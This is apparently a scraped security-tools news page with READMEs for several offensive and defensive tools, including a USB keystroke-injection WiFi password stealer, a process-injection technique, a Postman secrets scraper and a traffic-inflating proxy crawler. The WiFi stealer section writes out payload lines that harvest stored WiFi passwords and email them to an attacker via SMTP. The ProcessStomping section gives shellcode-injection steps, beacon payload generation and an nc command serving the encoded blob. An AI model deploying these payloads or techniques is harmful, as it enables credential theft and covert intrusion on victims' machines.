    [●] Vulnerabilities Scanned - [LFI✔] Found: 0
    [●] Vulnerabilities Scanned - [CRLF✔] Found: 0
    [●] Vulnerabilities Scanned - [SSRF✔] Found: 0
    [●] Vulnerabilities Scanned - [Sensitive Data✔] Found: 0
    [●] Vulnerabilities Scanned - [Open redirect✔] Found: 0
    [●] Vulnerabilities Scanned - [Subdomain Takeover✔] Found: 0
[●] Vulnerabilities Scanned - [Nuclei✔] Found: 0
    [●] Vulnerabilities Scanning Completed for Subdomains of bugcrowd.com Check: /vulnerabilities/


    ▒█▀▀█ █▀▀ █▀▀ █░░█ █░░ ▀▀█▀▀
    ▒█▄▄▀ █▀▀ ▀▀█ █░░█ █░░ ░░█░░
    ▒█░▒█ ▀▀▀ ▀▀▀ ░▀▀▀ ▀▀▀ ░░▀░░

    [+] Subdomains of bugcrowd.com
    [+] Subdomains Found: 0
    [+] Subdomains Alive: 0
    [+] Endpoints: 11032
    [+] XSS: 0
    [+] SQLi: 0
    [+] Open Redirect: 0
    [+] SSRF: 0
    [+] CRLF: 0
    [+] LFI: 0
    [+] Sensitive Data: 0
    [+] Subdomain Takeover: 0
    [+] Nuclei: 0

    Acknowledgement

WebCopilot is inspired by Garud & Pinaak by ROX4R.

    Thanks to the authors of the tools & wordlists used in this script.

    @aboul3la @tomnomnom @lc @hahwul @projectdiscovery @maurosoria @shelld3v @devanshbatham @michenriksen @defparam @projectdiscovery @bp0lr @ameenmaali @sqlmapproject @dwisiswant0 @OWASP @OJ @Findomain @danielmiessler @1ndianl33t @ROX4R

Warning: Developers assume no liability and are not responsible for any misuse or damage caused by this tool. So please use it with caution, because you are responsible for your own actions.


    PhantomCrawler - Boost Website Hits By Generating Requests From Multiple Proxy IPs

    By: Zion3R


    PhantomCrawler allows users to simulate website interactions through different proxy IP addresses. It leverages Python, requests, and BeautifulSoup to offer a simple and effective way to test website behaviour under varied proxy configurations.

    Features:

    • Utilizes a list of proxy IP addresses from a specified file.
    • Supports both HTTP and HTTPS proxies.
    • Allows users to input the target website URL, proxy file path, and a static port.
    • Makes HTTP requests to the specified website using each proxy.
    • Parses HTML content to extract and visit links on the webpage.
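Conceptually, the request-and-parse loop described above fits in a few lines of requests and BeautifulSoup. The sketch below is illustrative only (the target URL is a placeholder), not PhantomCrawler's actual code:

import requests
from bs4 import BeautifulSoup

def crawl_once(url, proxy):
    # Route both schemes through the same HTTP proxy entry.
    proxies = {"http": f"http://{proxy}", "https": f"http://{proxy}"}
    resp = requests.get(url, proxies=proxies, timeout=10)
    soup = BeautifulSoup(resp.text, "html.parser")
    # Collect every href on the page so it can be visited next.
    return [a["href"] for a in soup.find_all("a", href=True)]

for proxy in open("proxies.txt").read().split():
    try:
        links = crawl_once("https://example.com", proxy)
        print(f"{proxy} -> {len(links)} links")
    except requests.RequestException as exc:
        print(f"{proxy} failed: {exc}")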

    Usage:

    • POC Testing: Simulate website interactions to assess functionality under different proxy setups.
    • Web Traffic Increase: Boost website hits by generating requests from multiple proxy IPs.
    • Proxy Rotation Testing: Evaluate the effectiveness of rotating proxy IPs.
    • Web Scraping Testing: Assess web scraping tasks under different proxy configurations.
    • DDoS Awareness: Caution: The tool has the potential for misuse as a DDoS tool. Ensure responsible and ethical use.

Get new proxies (with ports) and add them to proxies.txt in this format: 50.168.163.176:80
• You can get them from https://free-proxy-list.net/. These free proxies are not validated and some might not work, so validate them before adding.

    How to Use:

1. Clone the repository:
git clone https://github.com/spyboy-productions/PhantomCrawler.git
2. Install dependencies:
pip3 install -r requirements.txt
3. Run the script:
python3 PhantomCrawler.py

    Disclaimer: PhantomCrawler is intended for educational and testing purposes only. Users are cautioned against any misuse, including potential DDoS activities. Always ensure compliance with the terms of service of websites being tested and adhere to ethical standards.


    Snapshots:

    If you find this GitHub repo useful, please consider giving it a star! 



    WiFi-password-stealer - Simple Windows And Linux Keystroke Injection Tool That Exfiltrates Stored WiFi Data (SSID And Password)

    By: Zion3R


Have you ever watched a film where a hacker plugs a seemingly ordinary USB drive into a victim's computer and steals data from it? - A proper wet dream for some.

    Disclaimer: All content in this project is intended for security research purpose only.

     

    Introduction

    During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).

    Setup

After creating pico-ducky, you only need to copy the modified payload (adjusted with your SMTP details for the Windows exploit and/or with the Linux password and USB drive name for the Linux exploit) to the RPi Pico.

    Prerequisites

    • Physical access to victim's computer.

    • Unlocked victim's computer.

• The victim's computer has to have internet access in order to send the stolen data using SMTP (for exfiltration over a network medium).

    • Knowledge of victim's computer password for the Linux exploit.

    Requirements - What you'll need


    • Raspberry Pi Pico (RPi Pico)
    • Micro USB to USB Cable
    • Jumper Wire (optional)
    • pico-ducky - Transformed RPi Pico into a USB Rubber Ducky
    • USB flash drive (for the exploit over physical medium only)


    Note:

    • It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.

• However, while pico-ducky is a good and budget-friendly solution, Rubber Ducky does offer things like stealthiness and use of the latest DuckyScript version.

    • In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.

    Keystroke injection tool

A keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.

    Keystroke injection

The payload uses the STRING command to process keystrokes for injection. It accepts one or more alphanumeric/punctuation characters and will type the remainder of the line exactly as-is into the target machine. ENTER/SPACE simulate presses of the corresponding keyboard keys.

    Delays

We use the DELAY command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element such as a command line to load. Delay is especially useful at the very beginning, when a new USB device is connected to a targeted computer: the computer must complete a set of actions before it can begin accepting input commands. In the case of HIDs, setup time is very short; in most cases it takes a fraction of a second, because the drivers are built-in. However, in some instances a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.

    Exfiltration

Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, an adversary can package it to avoid detection while sending it over the network, using encryption or compression. The two most common ways of exfiltration are:

    • Exfiltration over the network medium.
      • This approach was used for the Windows exploit. The whole payload can be seen here.

    • Exfiltration over a physical medium.
      • This approach was used for the Linux exploit. The whole payload can be seen here.

    Windows exploit

    In order to use the Windows payload (payload1.dd), you don't need to connect any jumper wire between pins.

    Sending stolen data over email

Once passwords have been exported to the .txt file, the payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions visit the following link. Also, the payload template needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL, SENDER_EMAIL and your email PASSWORD. In addition, you could also update the body and the subject of the email.

    STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587

    Note:

    • After sending data over the email, the .txt file is deleted.

• You can also use an SMTP server from another email provider, but you should be mindful of the SMTP server and port number you will write in the payload.

    • Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.

    Linux exploit

    In order to use the Linux payload (payload2.dd) you need to connect a jumper wire between GND and GPIO5 in order to comply with the code in code.py on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.

    Storing stolen data to USB flash drive

    Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK with the name of your USB drive in two places.

    STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt

    STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt

    In addition, you will also need to update the Linux PASSWORD in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.

    STRING echo PASSWORD | sudo -S echo

    STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')"

    Bash script

    In order to run the wifi_passwords_print.sh script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:

    echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK

    where PASSWORD is your account's password and USBSTICK is the name for your USB device.

    Quick overview of the payload

NetworkManager is based on the concept of connection profiles and uses plugins for reading/writing data. The keyfile plugin, which supports all the connection types and capabilities that NetworkManager has, stores network configuration profiles in an .ini-style keyfile format. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep command with regex in order to extract the data of interest. For file filtering, a positive lookbehind assertion was used ((?<=keyword)). The positive lookbehind assertion matches at a certain position in the string, namely right after the keyword, without making that text itself part of the match, so the regex (?<=keyword).* will match any text after the keyword. This allows the payload to match the values after the ssid and psk (pre-shared key) keywords.
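To illustrate the lookbehind in isolation, here is a small Python example against an assumed sample keyfile (the network name and password are made up):

import re

keyfile = """[wifi]
ssid=HomeNetwork

[wifi-security]
psk=SuperSecret1
"""

# (?<=ssid=) matches right after "ssid=" without including it in the match,
# so .* then captures only the value.
ssid = re.search(r"(?<=ssid=).*", keyfile).group()
psk = re.search(r"(?<=psk=).*", keyfile).group()
print(ssid, psk)  # HomeNetwork SuperSecret1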

For more information about NetworkManager, here are some useful links:

    Exfiltrated data formatting

    Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt file.

    Wireless_Network_Name Password
    --------------------- --------
    WLAN1 pass1
    WLAN2 pass2
    WLAN3 pass3

    USB Mass Storage Device Problem

One of the advantages of Rubber Ducky over RPi Pico is that it doesn't show up as a USB mass storage device once plugged in. Once plugged into the computer, all the machine sees is a USB keyboard. This isn't the default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND) and pin 20 (GPIO15). For more details visit this link.

    Tip:

    • Upload your payload to RPi Pico before you connect the pins.
    • Don't solder the pins because you will probably want to change/update the payload at some point.

    Payload Writer

When creating a functioning payload file, you can use the writer.py script, or you can manually change the template file. In order to run the script successfully you will need to pass, in addition to the script file name, the name of the OS (windows or linux) and the name of the payload file (e.g. payload1.dd). Below you can find an example of how to run the writer script when creating a Windows payload.

    python3 writer.py windows payload1.dd

    Limitations/Drawbacks

    • This pico-ducky currently works only on Windows OS.

    • This attack requires physical access to an unlocked device in order to be successfully deployed.

• The Linux exploit is far less likely to be successful, because in order to succeed you not only need physical access to an unlocked device, you also need to know the admin's password for the Linux machine.

    • Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.

    • Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.

• The pico-ducky device isn't stealthy; quite the opposite, it's rather bulky, especially if you solder the pins.

• Also, the pico-ducky device is noticeably slower than the Rubber Ducky running the same script.

    • If the Caps Lock is ON, some of the payload code will not be executed and the exploit will fail.

    • If the computer has a non-English Environment set, this exploit won't be successful.

    • Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.

    To-Do List

    • Fix Caps Lock bug.
    • Fix non-English Environment bug.
    • Obfuscate the command prompt.
    • Implement exfiltration over a physical medium.
    • Create a payload for Linux.
    • Encode/Encrypt exfiltrated data before sending it over email.
    • Implement indicator of successfully completed exploit.
    • Implement command history clean-up for Linux exploit.
    • Enhance the Linux exploit in order to avoid usage of sudo.


    Pantheon - Insecure Camera Parser

    By: Zion3R


    Pantheon is a GUI application that allows users to display information regarding network cameras in various countries as well as an integrated live-feed for non-protected cameras.

    Functionalities

Pantheon allows users to execute an API crawler. There was originally functionality that worked without any APIs (like Insecam), but Google's TOS kept getting in the way of the original scraping mechanism.


    Installation

    1. git clone https://github.com/josh0xA/Pantheon.git
    2. cd Pantheon
    3. pip3 install -r requirements.txt
      Execution: python3 pantheon.py
• Note: I will later add a GUI installer to make it fully independent of a CLI

    Windows

    • You can just follow the steps above or download the official package here.
    • Note, the PE binary of Pantheon was put together using pyinstaller, so Windows Defender might get a bit upset.

    Ubuntu

    • First, complete steps 1, 2 and 3 listed above.
    • chmod +x distros/ubuntu_install.sh
    • ./distros/ubuntu_install.sh

    Debian and Kali Linux

    • First, complete steps 1, 2 and 3 listed above.
    • chmod +x distros/debian-kali_install.sh
    • ./distros/debian-kali_install.sh

    MacOS

    • The regular installation steps above should suffice. If not, open up an issue.

    Usage

    (Enter) on a selected IP:Port to establish a Pantheon webview of the camera. (Use this at your own risk)

    (Left-click) on a selected IP:Port to view the geolocation of the camera.
    (Right-click) on a selected IP:Port to view the HTTP data of the camera (Ctrl+Left-click for Mac).

    Adjust the map as you please to see the markers.

• Also note that this app is far from perfect and not every link that shows up is a live feed; some are login pages (do NOT attempt to log in).

    Ethical Notice

The developer of this program, Josh Schiavone, is not responsible for misuse of this data gathering tool. Pantheon simply provides information that can be indexed by any modern search engine. Do not try to establish unauthorized access to live feeds that are password protected - that is illegal. Furthermore, if you do choose to use Pantheon to view a live-feed, do so at your own risk. Pantheon was developed for educational purposes only. For further information, please visit: https://joshschiavone.com/panth_info/panth_ethical_notice.html

    Licence

    MIT License
    Copyright (c) Josh Schiavone



    ProcessStomping - A Variation Of ProcessOverwriting To Execute Shellcode On An Executable'S Section

    By: Zion3R


    A variation of ProcessOverwriting to execute shellcode on an executable's section

    What is it

    For a more detailed explanation you can read my blog post

Process Stomping is a variation of hasherezade’s Process Overwriting, and it has the advantage of writing a shellcode payload to a targeted section instead of writing a whole PE payload over the hosting process's address space.

    These are the main steps of the ProcessStomping technique:

1. CreateProcess - setting the Process Creation Flag to CREATE_SUSPENDED (0x00000004) in order to suspend the process's primary thread.
    2. WriteProcessMemory - used to write each malicious shellcode to the target process section.
3. SetThreadContext - used to point the entry point to the new code section that has been written.
    4. ResumeThread - self-explanatory.
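To make step 1 concrete, here is a minimal Python sketch (illustrative only; the PoC itself is C++, and notepad.exe is just a placeholder target) that spawns a host process with its primary thread suspended:

import subprocess

CREATE_SUSPENDED = 0x00000004  # dwCreationFlags value from the WinAPI

# Step 1: spawn a legitimate host process with its primary thread suspended.
proc = subprocess.Popen("notepad.exe", creationflags=CREATE_SUSPENDED)
print(f"Suspended host process PID: {proc.pid}")

# Steps 2-4 (WriteProcessMemory / SetThreadContext / ResumeThread) would be
# driven through ctypes against the process handle; omitted here.
proc.kill()  # clean up the suspended process in this demo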

As an example application of the technique, the PoC can be used with sRDI to load a beacon DLL over an executable RWX section.


    Disclaimer

    All information and content is provided for educational purposes only. Follow instructions at your own risk. Neither the author nor his employer are responsible for any direct or consequential damage or loss arising from any person or organization.

    Credits

    This work has been made possible because of the knowledge and tools shared by Aleksandra Doniec @hasherezade and Nick Landers.

    Usage

    Select your target process and modify global variables accordingly in ProcessStomping.cpp.

    Compile the sRDI project making sure that the offset is enough to jump over your generated sRDI shellcode blob and then update the sRDI tools:

    cd \sRDI-master

    python .\lib\Python\EncodeBlobs.py .\

    Generate a Reflective-Loaderless dll payload of your choice and then generate sRDI shellcode blob:

    python .\lib\Python\ConvertToShellcode.py -b -f "changethedefault" .\noRLx86.dll

The shellcode blob can then be XORed with a keyword and downloaded using a simple socket:

    python xor.py noRLx86.bin noRLx86_enc.bin Bangarang
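xor.py ships with the repository; a functionally equivalent helper might look like the following sketch (not necessarily the repo's exact implementation):

import itertools
import sys

# Usage: python xor.py <input.bin> <output.bin> <keyword>
inp, outp, key = sys.argv[1], sys.argv[2], sys.argv[3].encode()

data = open(inp, "rb").read()
# XOR every byte of the blob with the repeating keyword.
open(outp, "wb").write(bytes(b ^ k for b, k in zip(data, itertools.cycle(key))))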

    Deliver the xored blob upon connection

    nc -vv -l -k -p 8000 -w 30 < noRLx86_enc.bin

    The sRDI blob will get erased after execution to remove unneeded artifacts.

    Caveats

    To successfully execute this technique you should select the right target process and use a dll payload that doesn't come with a User Defined Reflective loader.

    Detection opportunities

    Process Stomping technique requires starting the target process in a suspended state, changing the thread's entry point, and then resuming the thread to execute the injected shellcode. These are operations that might be considered suspicious if performed in quick succession and could lead to increased scrutiny by some security solutions.



    PipeViewer - A Tool That Shows Detailed Information About Named Pipes In Windows

    By: Zion3R


    A GUI tool for viewing Windows Named Pipes and searching for insecure permissions.

    The tool was published as part of a research about Docker named pipes:
    "Breaking Docker Named Pipes SYSTEMatically: Docker Desktop Privilege Escalation – Part 1"
    "Breaking Docker Named Pipes SYSTEMatically: Docker Desktop Privilege Escalation – Part 2"

    Overview

    PipeViewer is a GUI tool that allows users to view details about Windows Named pipes and their permissions. It is designed to be useful for security researchers who are interested in searching for named pipes with weak permissions or testing the security of named pipes. With PipeViewer, users can easily view and analyze information about named pipes on their systems, helping them to identify potential security vulnerabilities and take appropriate steps to secure their systems.


    Usage

    Double-click the EXE binary and you will get the list of all named pipes.
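If you only need the raw pipe names without the GUI, Windows also exposes them under \\.\pipe\, which Python can list directly (a quick sketch unrelated to PipeViewer's NtApiDotNet internals, and without any of the permission details the tool surfaces):

import os

# Named pipes appear as directory entries under \\.\pipe\ on Windows.
for name in sorted(os.listdir("\\\\.\\pipe\\")):
    print(name)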

    Build

    We used Visual Studio to compile it.
When downloading it from GitHub you might get errors about blocked files; you can use PowerShell to unblock them:

    Get-ChildItem -Path 'D:\tmp\PipeViewer-main' -Recurse | Unblock-File

    Warning

    We built the project and uploaded it so you can find it in the releases.
One problem is that the binary will trigger alerts from Windows Defender because it uses the NtObjectManager package, which is flagged as a virus.
Note that James Forshaw talked about it here.
We can't change this because we depend on that third-party DLL.

    Features

    • A detailed overview of named pipes.
    • Filter\highlight rows based on cells.
    • Bold specific rows.
    • Export\Import to\from JSON.
    • PipeChat - create a connection with available named pipes.

    Demo

    PipeViewer3_v1.0.mp4

    Credit

    We want to thank James Forshaw (@tyranid) for creating the open source NtApiDotNet which allowed us to get information about named pipes.

    License

    Copyright (c) 2023 CyberArk Software Ltd. All rights reserved
    This repository is licensed under Apache-2.0 License - see LICENSE for more details.

    References

    For more comments, suggestions or questions, you can contact Eviatar Gerzi (@g3rzi) and CyberArk Labs.



    APIDetector - Efficiently Scan For Exposed Swagger Endpoints Across Web Domains And Subdomains

    By: Zion3R


APIDetector is a powerful and efficient tool designed for testing exposed Swagger endpoints in various subdomains, with smart capabilities to detect false positives. It's particularly useful for security professionals and developers who are engaged in API testing and vulnerability scanning.


    Features

    • Flexible Input: Accepts a single domain or a list of subdomains from a file.
    • Multiple Protocols: Option to test endpoints over both HTTP and HTTPS.
    • Concurrency: Utilizes multi-threading for faster scanning.
    • Customizable Output: Save results to a file or print to stdout.
    • Verbose and Quiet Modes: Default verbose mode for detailed logs, with an option for quiet mode.
    • Custom User-Agent: Ability to specify a custom User-Agent for requests.
    • Smart Detection of False-Positives: Ability to detect most false-positives.

    Getting Started

    Prerequisites

    Before running APIDetector, ensure you have Python 3.x and pip installed on your system. You can download Python here.

    Installation

    Clone the APIDetector repository to your local machine using:

    git clone https://github.com/brinhosa/apidetector.git
    cd apidetector
    pip install requests

    Usage

    Run APIDetector using the command line. Here are some usage examples:

    • Common usage, scan with 30 threads a list of subdomains using a Chrome user-agent and save the results in a file:

      python apidetector.py -i list_of_company_subdomains.txt -o results_file.txt -t 30 -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
    • To scan a single domain:

      python apidetector.py -d example.com
    • To scan multiple domains from a file:

      python apidetector.py -i input_file.txt
    • To specify an output file:

      python apidetector.py -i input_file.txt -o output_file.txt
    • To use a specific number of threads:

      python apidetector.py -i input_file.txt -t 20
    • To scan with both HTTP and HTTPS protocols:

      python apidetector.py -m -d example.com
    • To run the script in quiet mode (suppress verbose output):

      python apidetector.py -q -d example.com
    • To run the script with a custom user-agent:

      python apidetector.py -d example.com -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"

    Options

    • -d, --domain: Single domain to test.
    • -i, --input: Input file containing subdomains to test.
    • -o, --output: Output file to write valid URLs to.
    • -t, --threads: Number of threads to use for scanning (default is 10).
    • -m, --mixed-mode: Test both HTTP and HTTPS protocols.
    • -q, --quiet: Disable verbose output (default mode is verbose).
    • -ua, --user-agent: Custom User-Agent string for requests.
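Conceptually, the core of such a scanner is a concurrent GET across candidate paths with a body check to weed out false positives. The sketch below is hypothetical (a trimmed path list and a placeholder domain), not APIDetector's implementation:

from concurrent.futures import ThreadPoolExecutor

import requests

# A small subset of the documentation paths listed below.
PATHS = ["/swagger-ui.html", "/openapi.json", "/v3/api-docs"]

def probe(url):
    try:
        r = requests.get(url, timeout=5, allow_redirects=True)
        # Fingerprint the body, since many servers return 200 for anything.
        if r.status_code == 200 and ("swagger" in r.text.lower() or "openapi" in r.text.lower()):
            return url
    except requests.RequestException:
        pass
    return None

with ThreadPoolExecutor(max_workers=10) as pool:
    urls = [f"https://example.com{p}" for p in PATHS]
    for hit in filter(None, pool.map(probe, urls)):
        print("exposed:", hit)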

    RISK DETAILS OF EACH ENDPOINT APIDETECTOR FINDS

Exposing Swagger or OpenAPI documentation endpoints can present various risks, primarily related to information disclosure. Here's an ordered list of the endpoints APIDetector scans, grouped by similarity and ordered by potential risk level:

    1. High-Risk Endpoints (Direct API Documentation):

    • Endpoints:
      • '/swagger-ui.html', '/swagger-ui/', '/swagger-ui/index.html', '/api/swagger-ui.html', '/documentation/swagger-ui.html', '/swagger/index.html', '/api/docs', '/docs', '/api/swagger-ui', '/documentation/swagger-ui'
    • Risk:
      • These endpoints typically serve the Swagger UI interface, which provides a complete overview of all API endpoints, including request formats, query parameters, and sometimes even example requests and responses.
      • Risk Level: High. Exposing these gives potential attackers detailed insights into your API structure and potential attack vectors.

    2. Medium-High Risk Endpoints (API Schema/Specification):

    • Endpoints:
      • '/openapi.json', '/swagger.json', '/api/swagger.json', '/swagger.yaml', '/swagger.yml', '/api/swagger.yaml', '/api/swagger.yml', '/api.json', '/api.yaml', '/api.yml', '/documentation/swagger.json', '/documentation/swagger.yaml', '/documentation/swagger.yml'
    • Risk:
      • These endpoints provide raw Swagger/OpenAPI specification files. They contain detailed information about the API endpoints, including paths, parameters, and sometimes authentication methods.
      • Risk Level: Medium-High. While they require more interpretation than the UI interfaces, they still reveal extensive information about the API.

    3. Medium Risk Endpoints (API Documentation Versions):

    • Endpoints:
      • '/v2/api-docs', '/v3/api-docs', '/api/v2/swagger.json', '/api/v3/swagger.json', '/api/v1/documentation', '/api/v2/documentation', '/api/v3/documentation', '/api/v1/api-docs', '/api/v2/api-docs', '/api/v3/api-docs', '/swagger/v2/api-docs', '/swagger/v3/api-docs', '/swagger-ui.html/v2/api-docs', '/swagger-ui.html/v3/api-docs', '/api/swagger/v2/api-docs', '/api/swagger/v3/api-docs'
    • Risk:
      • These endpoints often refer to version-specific documentation or API descriptions. They reveal information about the API's structure and capabilities, which could aid an attacker in understanding the API's functionality and potential weaknesses.
      • Risk Level: Medium. These might not be as detailed as the complete documentation or schema files, but they still provide useful information for attackers.

    4. Lower Risk Endpoints (Configuration and Resources):

    • Endpoints:
      • '/swagger-resources', '/swagger-resources/configuration/ui', '/swagger-resources/configuration/security', '/api/swagger-resources', '/api.html'
    • Risk:
      • These endpoints often provide auxiliary information, configuration details, or resources related to the API documentation setup.
      • Risk Level: Lower. They may not directly reveal API endpoint details but can give insights into the configuration and setup of the API documentation.

    Summary:

    • Highest Risk: Directly exposing interactive API documentation interfaces.
    • Medium-High Risk: Exposing raw API schema/specification files.
    • Medium Risk: Version-specific API documentation.
    • Lower Risk: Configuration and resource files for API documentation.

    Recommendations:

    • Access Control: Ensure that these endpoints are not publicly accessible or are at least protected by authentication mechanisms.
    • Environment-Specific Exposure: Consider exposing detailed API documentation only in development or staging environments, not in production.
    • Monitoring and Logging: Monitor access to these endpoints and set up alerts for unusual access patterns.

    Contributing

    Contributions to APIDetector are welcome! Feel free to fork the repository, make changes, and submit pull requests.

    Legal Disclaimer

    The use of APIDetector should be limited to testing and educational purposes only. The developers of APIDetector assume no liability and are not responsible for any misuse or damage caused by this tool. It is the end user's responsibility to obey all applicable local, state, and federal laws. Developers assume no responsibility for unauthorized or illegal use of this tool. Before using APIDetector, ensure you have permission to test the network or systems you intend to scan.

    License

    This project is licensed under the MIT License.

    Acknowledgments



    Py-Amsi - Scan Strings Or Files For Malware Using The Windows Antimalware Scan Interface

    By: Zion3R


py-amsi is a library that scans strings or files for malware using the Windows Antimalware Scan Interface (AMSI) API. AMSI is an interface native to Windows that allows applications to ask the antivirus installed on the system to analyse a file/string. AMSI is not tied to Windows Defender; antivirus providers implement the AMSI interface to receive calls from applications. This library takes advantage of the API to perform antivirus scans in Python. Read more about the Windows AMSI API here.


    Installation

    • Via pip

      pip install pyamsi
    • Clone repository

      git clone https://github.com/Tomiwa-Ot/py-amsi.git
      cd py-amsi/
      python setup.py install

    Usage

    from pyamsi import Amsi

    # Scan a file
    Amsi.scan_file(file_path, debug=True) # debug is optional and False by default

    # Scan string
    Amsi.scan_string(string, string_name, debug=False) # debug is optional and False by default

    # Both functions return a dictionary of the format
    # {
    # 'Sample Size' : 68, // The string/file size in bytes
    # 'Risk Level' : 0, // The risk level as suggested by the antivirus
    # 'Message' : 'File is clean' // Response message
    # }
Risk Level | Meaning
0          | AMSI_RESULT_CLEAN (File is clean)
1          | AMSI_RESULT_NOT_DETECTED (No threat detected)
16384      | AMSI_RESULT_BLOCKED_BY_ADMIN_START (Threat is blocked by the administrator)
20479      | AMSI_RESULT_BLOCKED_BY_ADMIN_END (Threat is blocked by the administrator)
32768      | AMSI_RESULT_DETECTED (File is considered malware)
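As a quick sanity check of whatever antivirus is registered with AMSI, you can scan the harmless EICAR test string, which any engine should flag (a usage sketch based on the API above):

from pyamsi import Amsi

# The standard EICAR anti-virus test string (harmless by design).
EICAR = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"

result = Amsi.scan_string(EICAR, "eicar_test")
print(result)  # expect 'Risk Level': 32768 (AMSI_RESULT_DETECTED) if AV is active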

    Docs

    https://tomiwa-ot.github.io/py-amsi/index.html



    Porch-Pirate - The Most Comprehensive Postman Recon / OSINT Client And Framework That Facilitates The Automated Discovery And Exploitation Of API Endpoints And Secrets Committed To Workspaces, Collections, Requests, Users And Teams

    By: Zion3R


Porch Pirate started as a tool to quickly uncover Postman secrets, and has slowly begun to evolve into a multi-purpose reconnaissance / OSINT framework for Postman. While existing tools are great proofs of concept, they only attempt to identify very specific keywords as "secrets", in very limited locations, and with no consideration of recon beyond secrets. We realized we required capabilities that were "secret-agnostic" and flexible enough to capture false positives that still provided offensive value.

    Porch Pirate enumerates and presents sensitive results (global secrets, unique headers, endpoints, query parameters, authorization, etc), from publicly accessible Postman entities, such as:

    • Workspaces
    • Collections
    • Requests
    • Users
    • Teams

    Installation

    python3 -m pip install porch-pirate

    Using the client

The Porch Pirate client can be used to conduct nearly complete reviews of public Postman entities in a quick and simple fashion. There are intended workflows and particular keywords that can typically maximize results. These methodologies can be found on our blog: Plundering Postman with Porch Pirate.

    Porch Pirate supports the following arguments to be performed on collections, workspaces, or users.

    • --globals
    • --collections
    • --requests
    • --urls
    • --dump
    • --raw
    • --curl

    Simple Search

    porch-pirate -s "coca-cola.com"

    Get Workspace Globals

    By default, Porch Pirate will display globals from all active and inactive environments if they are defined in the workspace. Provide a -w argument with the workspace ID (found by performing a simple search, or automatic search dump) to extract the workspace's globals, along with other information.

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8

    Dump Workspace

    When an interesting result has been found with a simple search, we can provide the workspace ID to the -w argument with the --dump command to begin extracting information from the workspace and its collections.

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --dump

    Automatic Search and Globals Extraction

    Porch Pirate can be supplied a simple search term, following the --globals argument. Porch Pirate will dump all relevant workspaces tied to the results discovered in the simple search, but only if there are globals defined. This is particularly useful for quickly identifying potentially interesting workspaces to dig into further.

    porch-pirate -s "shopify" --globals

    Automatic Search Dump

    Porch Pirate can be supplied a simple search term, following the --dump argument. Porch Pirate will dump all relevant workspaces and collections tied to the results discovered in the simple search. This is particularly useful for quickly sifting through potentially interesting results.

    porch-pirate -s "coca-cola.com" --dump

    Extract URLs from Workspace

    A particularly useful way to use Porch Pirate is to extract all URLs from a workspace and export them to another tool for fuzzing.

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --urls

    Automatic URL Extraction

    Porch Pirate will recursively extract all URLs from workspaces and their collections related to a simple search term.

    porch-pirate -s "coca-cola.com" --urls

    Show Collections in a Workspace

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --collections

    Show Workspace Requests

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --requests

    Show raw JSON

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --raw

    Show Entity Information

    porch-pirate -w WORKSPACE_ID
    porch-pirate -c COLLECTION_ID
    porch-pirate -r REQUEST_ID
    porch-pirate -u USERNAME/TEAMNAME

    Convert Request to Curl

    Porch Pirate can build curl requests when provided with a request ID for easier testing.

